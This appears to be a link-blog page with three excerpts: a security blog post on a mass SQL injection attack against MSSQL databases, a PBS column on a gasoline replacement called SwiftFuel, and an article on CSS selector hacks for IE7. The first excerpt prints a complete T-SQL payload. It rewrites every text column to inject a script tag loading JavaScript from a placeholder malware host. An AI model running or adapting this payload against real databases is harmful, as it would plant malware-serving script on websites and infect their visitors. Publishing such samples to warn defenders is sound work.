TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [‘[email protected]+’] set [‘[email protected] +’]=[‘[email protected]+’]+””></title><script src=”http://www.domain.com/malware/ w.js”></script><!–” where ‘[email protected]+’ not like ”%”></title><script src=”http://www.domain.com/malware/w.js “></script><!–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 TrustedSource – Blog – New SQL Injection Attack Infecting Machines

I, Cringely . The Pulpit . It’s the Platform, Stupid | PBS

Bob's Weekly Technification

I, Cringely . The Pulpit . It’s the Platform, Stupid | PBS

Robert X. Cringely Cars are the key to U.S. energy consumption. The dominant automotive platform here, whether you drive a truck, a car, or a motorcycle, relies on gasoline-fueled internal combustion engines. That’s the platform we are unlikely to change quickly. So how do we leave that platform intact and unchanged, ask nobody to significantly sacrifice, yet still achieve the noble (and Nobel) goals of lower fuel consumption, lower greenhouse gas emissions, lower pollution levels, dramatically lower oil consumption, lower cost, and lower geopolitical vulnerability for our country? There’s only one way I know to accomplish this: change the fuel.

This happened to a certain extent in Brazil during the ’70s and ’80s by embracing ethanol. But ethanol has less energy per gallon so fuel consumption goes up and mileage goes down. Ethanol can’t be shipped in pipelines also used for oil. Cars have to be modified to run on it and even then there are issues about internal corrosion. Ethanol is far from perfect. What’s needed is a replacement for gasoline that looks and feels and tastes just like gas to your car but isn’t made from oil. Then the platform could remain completely unchanged yet my 1966 Thunderbird (and the world) could benefit starting with the very next tankful.

There is such a fuel, developed by a husband and wife team of scientists working in Indiana in cooperation with Purdue University. This new fuel, called SwiftFuel, is right now intended for airplanes, not cars, but the lessons are the same.

CSS Hacks and IE7

This is a really great article on how to hack IE7. CSS Hacks and IE7

  • The Child Selector
  • This selector uses a “>” symbol as a “combinator” that is placed between two parts of a CSS selector, and indicates that the target of the rule is the element on the right side of the “>” combinator, but only when that element is a direct child of the element to the left of the combinator. Thus, the selector table>td can never target any element, because TD’s are never direct children of tables, only of TR’s. On the other hand, the selector tr>td would select every TD on the page, since all TD’s are direct children of TR’s.

    The main difference between the Child combinator and the familiar space combinator is that the space combinator is a “descendant” combinator, meaning that the element to the right of the space only needs to be between the tags of the element on the left to be selected. So with the selector table td, all TD’s will selected, since TD’s always fall between the tag pair of one table or another.

    The Child combinator is quite useful for targeting rules to direct children of an element, without also targeting the more deeply nested descendants as well. Unfortunately, up until IE7 there was no point in using it for its intended purpose, since so few of the viewing public would get the benefits of the styling.

  • The Adjacent Sibling Selector
    • This selector is a “+” combinator symbol placed between parts of a selector, and is very similar to the Child combinator. The only difference between the two is that while the Child combinator points to direct children of an element, the Adjacent Sibling combinator points to an element which directly follows another element in the source.

      Thus the selector tr+td cannot select anything, because no TD ever directly follows a TR. Instead, TD’s are contained inside TR’s, and that is not considered to be “following” the TR. However, the selector tr+tr would select any TR that directly followed another TR, which means that every TR within a table would be selected except for the very first TR in that table.

      Get it? An adjacent sibling element not only follows its previous sibling, but is also completely separate from it. Further, if two DIV’s are in sequence and each contains a paragraph, those two paragraphs are not considered siblings, because they reside in different parent elements. The fact that one follows another means nothing unless the following sibling starts at the same point where the previous sibling ends.

  • Star HTML

Oh, you want to know about that structural thing? Well, the hack that uses it is called the star-html hack, and it works by taking advantage of an oddity in Explorer’s treatment of the Document Object Model, or DOM for short. Simply stated, all web pages start with a root element called html, which then contains two children, the head and the body elements. Those two then contain other children, and so forth.

  • Most browsers obey this arrangement, but Explorer for both Win and Mac do not. They seem to think there is a mysterious element enclosing the html element! It’s pretty strange, but in fact this extra outer “root” element has no apparent ill effects on web pages, and remained unnoticed for years, until Edwardson Tan began experimenting with CSS selectors. He found that a selector written as * html  .targetelement would apply the styles to .targetelement, but only for the IE browsers.

    Think about it. That star is the “universal” selector, so it points to any element, but it comes before html. Therefore, the full selector in effect says: “Select .targetelement when it is contained within html, and when html is contained within any other element”.